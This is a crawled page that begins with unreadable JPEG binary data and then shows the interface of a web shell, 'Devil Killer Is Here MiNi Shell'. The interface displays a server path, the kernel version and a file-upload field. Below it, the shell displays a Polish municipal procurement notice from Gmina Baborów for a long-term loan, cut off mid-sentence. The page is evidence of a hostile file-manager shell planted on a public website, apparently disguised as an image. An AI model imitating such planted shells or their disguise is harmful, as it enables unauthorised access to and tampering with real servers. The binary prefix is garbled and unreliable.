JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210921/0018724401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Udzielenie i obsługa kredytu długoterminowego w kwocie 1 881 850,00 zł </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Baborów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412817</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ratuszowa 2a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Baborów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">48-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">77 403 69 20</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">77 403 69 28</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@baborow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.baborow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Udzielenie i obsługa kredytu długoterminowego w kwocie 1 881 850,00 zł </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d5fc360d-1ac8-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00187244</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005091/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Udzielenie i obsługa kredytu długoterminowego w kwocie 1 881 850,00 zł</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl, ogłoszenie i dokumenty do pobrania dostępne także na stronie: www.bip.baborow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.<br/>Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1) drogą elektroniczną: https://epuap.gov.pl/GMINABABOROW/SkrytkaESP<br/>2) poprzez Platformę, dostępną pod adresem: https://miniportal.uzp.gov.pl<br/>Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Identyfikator postępowania i klucz publiczny dla danego postępowania o udzielenie zamówienia dostępne są na liście wszystkich postępowań na miniPortalu.<br/> Zgodnie z art. 67 ustawy p.z.p., Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>1) dostęp do sieci Internet;<br/>2) kwalifikowany podpis elektroniczny, pieczęć elektroniczna, podpis zaufany lub podpis osobisty;<br/>3) edytor tekstowy lub inny program pozwalający na przygotowanie oferty</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Burmistrz Baborowa;<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@baborow.pl <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGP.271.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest udzielenie i obsługa kredytu długoterminowego. Kredyt zostanie przeznaczony na sfinansowanie planowanego deficytu budżetu w tym na finansowanie działań realizowanych ze środków pochodzących z budżetu Unii Europejskiej oraz spłatę wcześniej zaciągniętych zobowiązań w łącznej wysokości 1.881.850 PLN (słownie: jeden milion osiemset osiemdziesiąt jeden tysięcy osiemset pięćdziesiąt zł 00/100), w tym: <br/>- na finansowanie działań realizowanych ze środków pochodzących z budżetu Unii Europejskiej w wysokości 305.200 zł:<br/>a) „Rewitalizacja parku miejskiego w ramach projektu: Parki i rzemiosła naszych przodków” – 130.000 zł,<br/>b) „Rewitalizacja terenu rekreacyjnego na działce nr 713 przy ul. Wiejskiej w Baborowie” – 137.000 zł,<br/>c) „Utworzenie Centrum Edukacji Ekologicznej w Rakowie” – 38.200 zł.<br/>- realizację pozostałych zadań inwestycyjnych oraz spłatę wcześniej zaciągniętych zobowiązań w kwocie 1.576.650 zł.<br/> Podstawowe dane o kredycie:<br/>a)	Rodzaj transakcji: udzielenie i obsługa kredytu długoterminowego,<br/>b)	Kwota i waluta kredytu: 1.881.850 zł, uruchamiana według dyspozycji kredytobiorcy w okresie od dnia podpisania umowy do 30.12.2021 r. <br/>W celu obliczenia wartości zamówienia, na potrzeby porównania ofert przyjmuje się następujące terminy uruchomienia kredytu: <br/>- 15 listopada 2021 r.– 1.000.000 zł,<br/>- 15 grudnia 2021 r. - 881.850 zł, <br/>Zamawiający zastrzega sobie prawo zmiany rzeczywistego termin uruchomienia kredytu, nie później jednak niż do dnia 30.12.2021 r. <br/>2. Spłata kapitału następować będzie w następujący sposób:<br/> I. Spłata kapitału zaciągniętego na finansowanie zadań inwestycyjnych w części środków unijnych nastąpi w ciągi 30 dni od dnia wpływu zrefundowanych środków za zrealizowane zadania na rachunek budżetu Gminy. W celu obliczenia wartości zamówienia, na potrzeby porównania ofert przyjmuje się następujące terminy spłaty kredytu: <br/>a) 31.12.2022 r. – 130.000 zł,<br/>b) 31.12.2022 r. – 137.000 zł,<br/>c) 31.12.2022 r. - 38.200 zł.<br/>W przypadku nieotrzymania refundacji środków unijnych w terminie umożliwiającym spłatę zadłużenia w terminie określonym powyżej, oferent zapewni możliwość przeniesienia terminów spłat na kolejny okres w formie uzgodnionej z zamawiającym. <br/>II . Spłata kapitału zaciągniętego na realizację pozostałych zadań inwestycyjnych oraz spłatę wcześniej zaciągniętych zobowiązań następować będzie począwszy od dnia 30 września 2022 r. w następujący sposób:<br/>1. w 2022 r. - 50.000 zł (2 raty po 25,000,00 zł,),<br/>2. w 2023 r. - 40.000 zł (4 raty po 10.000,00 zł, ),<br/>3. w 2024 r. - 100.000 zł (4 raty po 25.000,00 zł,),<br/>4. w 2025 r. - 160.000 zł (4 raty po 40.000,00 zł,),<br/>5. w 2026 r. - 160.000 zł (4 raty po 40.000,00 zł,),<br/>6. w 2027 r. - 160.000 zł (4 raty po 40.000,00 zł,),<br/>7. w 2028 r. - 160.000 zł (4 raty po 40.000,00 zł,),<br/>8. w 2029 r. - 160.000 zł (4 raty po 40.000,00 zł,)<br/>9. w 2030 r. - 160.000 zł (4 raty po 40.000,00 zł,)<br/>10. w 2031 r. - 160.000 zł (4 raty po 40.000,00 zł,)<br/>11. w 2032 r. - 266.650 zł (3 raty po 66.500,00 zł, 1 rata 67.150,00 zł).<br/>Spłata rat kapitału następować będzie ostatniego dnia kalendarzowego każdego kwartału. <br/>Ustala się okres karencji w spłacie tej części kredytu do 29 września 2022 r.<br/>3. Okres kredytowania: do 31.12.2032 r.<br/>4. Uruchomienie kredytu: następować będzie wg odrębnych pisemnych dyspozycji kredytobiorcy w terminie od dnia podpisania umowy do 30 grudnia 2021 r. <br/>5. Zamawiający zastrzega sobie prawo wcześniejszej spłaty kredytu, bez ponoszenia dodatkowych kosztów z tego tytułu. W przypadku wcześniejszej spłaty kredytu odsetki liczone będą za okres jego faktycznego wykorzystania.<br/>6. Terminy płatności odsetek: spłata odsetek będzie się odbywać w okresach miesięcznych, na podstawie otrzymanego od banku zawiadomienia o ich wysokości, począwszy od miesiąca następującego po miesiącu w którym nastąpiło uruchomienie kredytu w terminie do 25 dnia miesiąca następującego po miesiącu, za który odsetki naliczono. Odsetki za pełny miesiąc kalendarzowy naliczane będą od aktualnego zadłużenia na rachunku kredytowym, na koniec danego miesiąca. Zawiadomienie o wysokości naliczonych odsetek winno być dostarczone zamawiającemu najpóźniej 10 dni przed ich terminem płatności. Dopuszcza się elektroniczną formę przesyłania tego zawiadomienia. <br/>7. Oprocentowanie kredytu: kredyt jest oprocentowany wg zmiennej stopy procentowej obowiązującej w okresach, za które odsetki są naliczane. <br/>8. Oprocentowanie kredytu ustala się na stawce bazowej WIBOR 1M powiększone o wskazaną przez bank marżę w stosunku rocznym ( WIBOR 1M jest to stopa procentowa, po jakiej banki są skłonne udzielić pożyczek innym bankom, liczony jako średnia arytmetyczna ze wszystkich notowań z poprzedniego miesiąca kalendarzowego, liczony za okres od 1-go do ostatniego dnia każdego miesiąca). Oprocentowanie ulega zmianie każdego 1-go dnia miesiąca kalendarzowego w okresie kredytowania według stawki WIBOR 1 M za poprzedni miesiąc kalendarzowy. Wskazana w ofercie marża banku jest obowiązująca przez cały okres kredytowania. <br/>9. Do wyliczenia oprocentowania kredytu w ofercie należy przyjąć rzeczywistą liczbę dni w miesiącu, stawkę bazową WIBOR 1M w wysokości 0,18 % w stosunku rocznym oraz spłaty rat kapitału w sposób określony w pkt. I oraz II.<br/>10. Odsetki od kredytu nie podlegają kapitalizacji.<br/>11. Planowany okres zawarcia umowy kredytowej: w terminie związania ofertą.<br/>12. Wykonawca nie będzie pobierać żadnych dodatkowych opłat i prowizji z tytułu udzielenia i obsługi kredytu poza wymienionymi w SIWZ i przedstawionymi w ofercie.<br/>13. Prawne zabezpieczenie spłaty kredytu: weksel in blanco wraz z deklaracją wekslową z kontrasygnatą Skarbnika.<br/>14. Zamawiający zastrzega prawo do niewykorzystania pełnej kwoty kredytu.<br/>15. Źródło spłaty kredytu wraz z odsetkami: dochody budżetu Gminy Baborów.<br/>16. Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w walucie PLN.<br/>17. Wspólny Słownik Zamówień CPV: 66113000-5 – usługi udzielenia kredytu<br/>18. Zamawiający nie dopuszcza składania ofert częściowych.<br/>19. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych.<br/>20. Zamawiający nie dopuszcza udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 i 8.<br/>21. Do spraw nieuregulowanych w niniejszej SWZ mają zastosowanie przepisy ustawy z dn. 11 września 2019 r. Prawo zamówień publicznych (Dz. U z 2021 r. poz. 1129 ze zm.) oraz przepisy kodeksu cywilnego (Dz. U z 2020 poz. 1740 ze zm.) i Prawa bankowego (Dz. U. z 2020 r. poz. 1896 ze zm.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2032-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże, że posiada uprawnienia do wykonywania czynności bankowych zgodnie z ustawą z dnia 29 sierpnia 1997 r. Prawo bankowe (tj. Dz. U. z 2020 r. poz. 1896 ze zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zezwolenie lub inny dokument potwierdzający, że wykonawca posiada uprawnienia do wykonywania czynności bankowych zgodnie z ustawą z dnia 29 sierpnia 1997 roku Prawo Bankowe (tj. Dz. U. z 2020 r. poz. 1896 ze zm.)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Projekt umowy kredytowej oraz harmonogram spłaty kredytu <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na 